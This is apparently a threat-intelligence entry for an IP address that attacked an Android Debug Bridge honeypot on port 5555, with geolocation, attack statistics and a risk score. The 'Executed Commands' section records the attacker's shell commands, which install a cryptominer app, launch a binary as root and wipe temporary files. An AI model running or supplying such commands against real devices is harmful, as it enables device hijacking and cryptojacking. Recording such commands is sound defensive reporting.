TROYANOSYVIRUS
Active ThreatMEDIUM

111.55.120.33

Country of Origin🇨🇳 China
First Detection4/29/2026
Last Activity5/2/2026
ISPShandong Mobile Communication Company Limited
🎯
65
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
4
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS24444
ISP
Shandong Mobile Communication Company Limited

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

Executed Commands

$am start -n com.ufo.miner/com.example.test.MainActivity4x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity4x
$ps | grep trinity4x
$rm -f /data/local/tmp/ufo.apk4x
$pm install /data/local/tmp/ufo.apk4x
$chmod 0755 /data/local/tmp/nohup4x
$chmod 0755 /data/local/tmp/trinity4x
$rm -rf /data/local/tmp/*4x
$pm path com.ufo.miner4x
$/data/local/tmp/nohup /data/local/tmp/trinity4x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

45
/100
LowMediumHighCritical